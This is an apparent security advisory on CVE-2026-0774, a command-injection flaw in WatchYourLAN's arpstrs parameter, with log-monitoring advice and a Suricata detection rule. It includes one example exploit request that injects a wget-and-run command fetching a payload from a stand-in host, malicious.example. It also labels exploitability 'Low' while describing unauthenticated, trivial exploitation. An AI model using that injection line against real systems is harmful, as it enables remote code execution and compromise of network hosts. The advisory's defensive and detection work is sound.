CVE-2026-0774 – WatchYourLAN Argument Injection → Network-Adjacent Remote Code Execution

CVE: CVE-2026-0774
Name: WatchYourLAN Configuration Page Argument Injection Remote Code Execution Vulnerability
CVSS v3.1 Base Score: 8.8 (High)
Severity: High
Exploitability: Low (no authentication, no privileges, network-adjacent)
Exploit Availability: No publicly disclosed proof-of-concept at this time
Official Patch / Upgrade: Not available at the time of writing

What the Vulnerability Actually Is

WatchYourLAN is a network monitoring tool that includes a web-based management interface. In the configuration interface, there’s a parameter used for ARP strings (arpstrs). This parameter is expected to be a simple text string, but the application mistakenly takes whatever text is sent by a user and directly uses it inside a system-level call on the server.

Because the software doesn’t check or clean that input, special characters or command separators (like ;, |, &&, backticks, or shell substitution syntax) get interpreted by the operating system shell. If someone on the same network sends a carefully crafted HTTP request with malicious content in this arpstrs field, the server can be tricked into executing unintended operating system commands. In practical terms, that is remote code execution — the attacker’s code runs on the host where WatchYourLAN is installed, under the privileges of the WatchYourLAN service process.

This is dangerous because it doesn’t require logging in or any special credentials. An attacker just needs network access to the WatchYourLAN web interface to try exploitation.

How It Could Be Exploited in the Real World

1. Network Access — Since this is “network-adjacent,” the attacker can be on the same LAN, VPN, or other network segment where WatchYourLAN’s web UI is exposed. There’s no need for credentials.
2. Malicious HTTP Request — The attacker crafts an HTTP GET or POST request targeting the page where arpstrs is processed and includes shell metacharacters and additional malicious commands inside that parameter.
3. Shell Interpretation — Because the web application blindly inserts the supplied value into a system command invocation, the OS shell will parse and execute the injected commands.
4. Executed Payload — Once commands run, the attacker can:
   • Read or write files the service account can access
   • Launch additional tools or download payloads
   • Try to pivot deeper into the network
   • Install backdoors or malware for persistence

This is classic “command injection” combined with a remote code execution outcome.

Why It’s Serious

• No authentication required: An attacker doesn’t need to log in or otherwise authenticate to send the malicious request.
• Local system control: Execution happens with the privileges of the service user, which for many installs has broad access.
• Network-adjacent only: Direct public internet exposure isn’t required — if the service is on an internal network, anyone there could attempt exploitation.

These traits put this firmly in the “high risk” category even without a published exploit.

What a Detection or Exploitation Request Might Look Like

An attacker trying to exploit this would likely send requests that look unusual in server logs. For example:

GET /config?arpstrs=192.168.1.1;wget http://malicious.example/payload.sh -O /tmp/x.sh;sh /tmp/x.sh HTTP/1.1
Host: watchyourlan.local

The key point is the injection of shell metacharacters and commands (;, wget, sh, etc.) into a parameter that should normally be a simple list of IP or MAC strings.

In logs, defenders should be watching for:

• arpstrs= with embedded characters like ;, |, &&, backticks, or $( patterns
• URL-encoded variants of these (%3B, %7C, %24%28, etc.)
• Unexpected tools invoked via the WatchYourLAN service (e.g., curl, wget, sh)

How You Can Detect Exploitation Attempts

Logs to Monitor

• Web access logs — Look specifically at requests to WatchYourLAN’s configuration endpoints and examine query strings or request bodies that include arpstrs.
• Application debug or audit logs — Any errors showing unexpected arguments or child process execution.
• System process logs — The OS’s audit logs (e.g., auditd) for new processes started by the WatchYourLAN service.
• Network IDS / firewall logs — Alerts or traffic patterns that include suspicious HTTP query strings.

Suricata Rule

Here is a ready-to-use Suricata rule you could deploy to flag potentially malicious HTTP requests attempting to inject shell characters into the arpstrs field:

alert http any any -> any any (msg:"WatchYourLAN arpstrs command-injection attempt"; \
  uricontent:"arpstrs="; nocase; \
  pcre:"/arpstrs=[^&]*[;|`\\$\\(\\)\\&\\|]/i"; \
  classtype:web-application-attack; sid:1000001; rev:1;)

Rule Details

• Triggers when a request URI contains the arpstrs= parameter
• Uses a PCRE to spot common shell metacharacters inside the parameter
• Can be tuned further for your environment
• Works for Suricata and similar signature-based IDS/IPS systems

Practical Detection

Defenders should consider:

• Filtering on suspicious characters at reverse proxy or WAF layer before the traffic reaches the application.
• Alerting on unusual child processes started by the WatchYourLAN process (e.g., spawning /bin/sh, invoking wget/curl).
• Rate limiting or blocking external IPs attempting repeated malformed arpstrs requests.

Final Takeaway

In simple terms, this vulnerability exists because WatchYourLAN trusted input it shouldn’t have. That trust, combined with using that input in a system call, means an attacker can get the host to do almost anything the attacker wants — as long as they can talk to the management interface. There isn’t a tricky exploit needed: it’s about inserting characters that change the command the server runs.

Right now, vendors haven’t released an official patch in all environments, so defenders have to be extra cautious until an upgrade is available. Keeping access restricted, monitoring logs, and deploying detection rules are the best bets until the official fix is applied.